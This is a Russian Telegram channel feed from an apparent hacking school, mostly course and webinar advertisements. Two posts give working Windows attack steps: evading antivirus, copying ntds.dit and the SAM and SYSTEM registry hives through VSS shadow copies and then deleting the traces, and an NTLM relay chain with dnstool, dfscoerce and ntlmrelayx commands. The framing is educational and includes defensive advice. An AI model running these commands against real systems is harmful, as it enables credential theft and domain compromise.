Академия РуХак
89 subscribers
56 photos
2 files
16 links
РуХак Академия - школа практического хакинга

Хакеры • OSINT • Reverse

Специалисты с актуальным техническим опытом в кибербезопасности делятся:
• реальными кейсами атак
• методами защиты инфраструктуры
• инструментами хакеров и ан
Download Telegram
Направление: Дата-инжиниринг и квантизация моделей 💰 Условия:

💸 Вход в поток - 10 000 ₽
(140$)

💵 Занятие - 5 000 ₽ (70$)
Платишь только за те сессии, на которые приходишь.


⏱️ Формат:
онлайн • практика • лаборатории

🎓 После обучения : сертификат об окончании курсов ( не путать с повышением квалификации)

Количество мест ограничено.

📩 Запись:
@HKVD_A
@ruhack_school
4❤‍🔥1
🔺Рассмотрим практический сценарий обхода AVG при внутренней оценке безопасности.🔺 ✈️Точка входа это сервер Exchange DC-SERVER03. Конечная цель заключается в получении учетных данных из Active Directory на контроллере домена DC-SERVER01.✈️

👩‍💻Использование скомпилированных исполняемых файлов здесь приведет к немедленной блокировке сигнатурным анализом. Для снижения рисков детекта целесообразно использовать методологию Living off the Land. В данном случае PowerShell выступает оптимальным вектором доставки. Загрузка скриптов напрямую в оперативную память исключает создание файлов на диске и минимизирует взаимодействие с файловой системой антивируса. Встроенный модуль AMSI нейтрализуется применением стандартных техник обфускации строк.👩‍💻

🔠Главная техническая сложность на этапе работы с контроллером домена заключается в извлечении файла ntds.dit и кустов реестра SAM и SYSTEM. Прямое копирование или использование утилиты reg save блокируется операционной системой из-за эксклюзивного захвата файлов системными процессами. Кроме того AVG отслеживает подобные паттерны поведения как характерные для этапа credential dumping.🔠

✈️Для решения этой задачи применяется встроенная служба теневого копирования томов VSS. Данный механизм является легитимным системным API, поэтому решения EDR обычно не вмешиваются в его работу.✈️

На первом этапе инициируем создание снимка командой с указанием целевого тома.

vssadmin create shadow /for=C:


🔠Система возвращает идентификатор созданного слепка, который потребуется для следующего шага.🔠

✈️На втором этапе осуществляется обращение к теневой копии через синтаксис глобального корня устройства. Из этого изолированного контекста файлы копируются в рабочую директорию без блокировок со стороны ОС и антивируса. Необходимо заменить значение в скобках на полученный ранее идентификатор.✈️

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\NTDS\ntds.dit C:\temp\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SYSTEM C:\temp\SYSTEM

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ShadowCopy_ID]\Windows\System32\config\SAM C:\temp\SAM


👩‍💻На третьем этапе после успешного переноса данных производится обязательное удаление артефакта.👩‍💻

vssadmin delete shadows /for=C: /quiet


👩‍💻Данный пример наглядно демонстрирует, что блокировка известных вредоносных утилит не останавливает атакующего при наличии необходимых привилегий. Для защиты инфраструктуры синей команде рекомендуется ограничить права на использование VSS через групповые политики и настраивать мониторинг аномальных цепочек событий, где создание теневой копии жестко коррелирует с копированием файлов из пути GLOBALROOT👩‍💻
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤‍🔥1
⚡️ Вебинар в это воскресенье

🕵️ OSINT: как находят людей, инфраструктуру и скрытые связи в интернете

Разберём реальные методы, которые используют аналитики и специалисты по киберразведке.

На вебинаре:
• поиск по никнеймам и цифровому следу
• анализ соцсетей и утечек
• поиск по фото и геолокации
• инструменты OSINT-аналитиков

🗓 Воскресенье, 26 апреля
🕢 19:30 (МСК)
📍 Онлайн : Salute Jazz

Длительность: ~1-1.5 часа
Участие - Бесплатно

@ruhack_school
🔥2
6 шагов конкурентной разведки🕵️
🔴 Суббота 19:30 : Вебинар по хакингу и вскрытию периметра

Расскажем о методиках проникновения в инфраструктуру 🖨

На стриме:
• как находить дырявые сайты в дикой природе
• разведка: домены, сабдомены, то что спрятано
• скрытые админки и API: находим за минуты
• тулкит который реально юзают на заказах, а не из первой ссылки гугла
• разбор боевых кейсов: от первого запроса до "мы внутри"

Не важно новичок ты или уже что-то умеешь - после этого вебинара ты будешь видеть сайты по-другому.

🎤 2 спикера - практики, параллельно лекторы
📍 Онлайн
💰 1000₽ / $15

📩 Запись: @HKVD_A
🔥2
Всем привет!

А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )

Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так: echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.

Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2026 году : )

Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs



@ruhack_school
👍3
С Днём Победы.
9 Мая напоминает, что решимость, дисциплина и единство меняют ход истории. Тогда герои защищали Родину на земле и в небе. Сегодня новое поле битвы проходит в цифровом пространстве.

Помним подвиг предков.
Уважаем силу разума.
Развиваем навыки, чтобы быть готовыми к любым вызовам!

С праздником, с 9 Мая 🔥🇷🇺
🔥4
⚡️ НОВОЕ НАПРАВЛЕНИЕ - PYTHON Програмирование

Запускаем поток по Python-разработке .

Без «изучим print(123) за 3 недели».
Только то, что реально используется

На обучении:
• основы Python с практикой
• парсеры и автоматизация
• работа с API
• Telegram-боты
• сканеры и OSINT-инструменты
• работа с сетью и логами
• написание собственных утилит
• гейм разработка
Онлайн • практика • домашние задания

📩 Запись:
@HKVD_A
@ruhack_school
🔥2
⚡️ НОВОЕ НАПРАВЛЕНИЕ - DEVOPS & INFRASTRUCTURE

Практика работы с серверами, инфраструктурой и деплоем.

Курс для тех, кто хочет понимать как устроены реальные системы и инфраструктура компаний.

На обучении:
• Linux и администрирование
• Docker и контейнеры
• Nginx и веб-серверы
• CI/CD и автоматизация
• работа с VPS и cloud
• мониторинг и логи
• безопасность инфраструктуры

Разберём как:
• поднимают сервисы
• защищают инфраструктуру
• настраивают окружение для проектов и команд.

Подойдёт:
разработчикам • пентестерам • системным администраторам.

Онлайн • практика • лаборатории

📩 Запись:
@HKVD_A
@ruhack_schoo
⚡️ НЕТ ДЕНЕГ НА ОБУЧЕНИЕ?

Мы понимаем, что не у всех есть возможность сразу оплачивать обучение.
Поэтому открываем набор на бартерную основу.

Как это работает:

👨‍💻 Мы обучаем тебя выбранному направлению
🛠 Ты помогаешь проекту своими навыками и временем

Нужны люди по направлениям:
• OSINT
• Python
• DevOps
• контент и оформление
• модерация
• поиск информации
• Тестирование на проникновение

💰 Также доступны пакетные тарифы:

• 8 занятий — 36 000 ₽
• 12 занятий — 48 000 ₽
• 15 занятий — 55 000 ₽
• 18 занятий — 63 000 ₽
• 20 занятий — 70 000 ₽

Это возможность:
• получить практические навыки
• попасть в сообщество
• собрать опыт и кейсы
• вырасти в сфере ИБ

Главное — адекватность, желание учиться и активность.

📩 Писать:
@HKVD_A
@ruhack_scho
🔥21🤔1
🛡️ Наш студент совместно с преподавателем нашли две уязвимости у VPS-провайдера и получили за это вознаграждение по программе Bug Bounty

Обе дыры в ядре Linux. Называются Copy Fail и Dirty Frag. Если коротко: человек с доступом к серверу мог получить полные права администратора. Это плохо.

Затронуты серверы на Linux с ядром 2017 года и новее, если не ставились обновления безопасности.

Что делать: обновить ядро через менеджер пакетов и перезагрузить сервер. Всё, уязвимость закрыта.

Вот так выглядит работа специалиста по ИБ на практике.

Нашёл, доказал, сообщил, получил выплату 🤝
5